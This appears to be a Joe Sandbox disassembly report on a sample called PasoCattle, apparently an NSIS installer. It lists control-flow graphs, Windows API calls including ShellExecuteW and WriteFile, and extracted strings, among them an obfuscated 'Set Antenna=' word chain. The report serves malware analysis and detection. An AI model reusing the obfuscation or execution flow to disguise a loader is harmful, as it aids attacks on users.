                                                                                                                                                                        control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                        Strings
                                                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0042A4AD,00403792,00000000), ref: 004034FF
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                        Strings
                                                                                                                                                                        • Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-, xrefs: 004033FD
                                                                                                                                                                        • ... %d%%, xrefs: 004034C8
                                                                                                                                                                        • pAB, xrefs: 004033AB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                        • String ID: ... %d%%$Set Antenna=LJNgTransport-Mail-Angola-Both-Directory-klFlesh-Holders-Mx-Hugo-Guards-ZhQThread-Say-Injury-Davis-Honda-SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-DiFSlot-Fucked-Rf-Shipping-Indianapolis-mylSunset-Educators-$pAB
                                                                                                                                                                        • API String ID: 651206458-1427982325
                                                                                                                                                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                        • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                        • API String ID: 1459762280-1711415406
                                                                                                                                                                        • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                        • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                        • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                        • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                        • API String ID: 247603264-1827671502
                                                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        Strings
                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
